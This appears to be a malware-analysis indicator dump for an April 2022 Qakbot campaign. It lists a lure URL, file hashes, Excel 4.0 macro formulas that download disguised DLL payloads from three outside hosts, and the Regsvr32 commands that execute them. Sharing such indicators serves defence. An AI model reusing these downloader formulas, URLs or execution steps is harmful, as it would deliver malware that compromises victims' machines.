19.04.2022 | Qakbot | AA | Version 403.573 | Campaign | 1650264998

******************************
.url https://newcolors.com.uy/aqia/bqaouaoiamisrl
.zip b7c8c087b74a88f95e915cd22b357e38847b2aab1ef3f9f49fa46178ef42fb32
.xls 567a8a0e52a258d52c60f25778ad7ca368b9445d21dcdb8ebe0576a33fc8c8cd
.dll 

******************************

=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Rfgsg", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png", "C:\Rfgsg\Jefseg.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png", "C:\Rfgsg\Jefsega.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png", "C:\Rfgsg\Jefsegb.ooccxx")

https://debtsolversuk.co.uk/HLpeQJZi/NbVfNbhn.png
https://pablopereirasilvaluis.com.br/OHTvXEr9c/NbVfNbhn.png
https://portalregionpuno.com/088aFy0Xc8ap/NbVfNbhn.png

*************************************************

Exec >>

EXCEL.EXE /dde C:\Users\Admin\AppData\Local\Temp\J-1514925657.xlsb

Regsvr32 /s calc

Regsvr32 C:\Rfgsg\Jefseg.ooccxx

Regsvr32 C:\Rfgsg\Jefsega.ooccxx

Regsvr32 C:\Rfgsg\Jefsegb.ooccxx

*************************************************


*************************************************

c2's
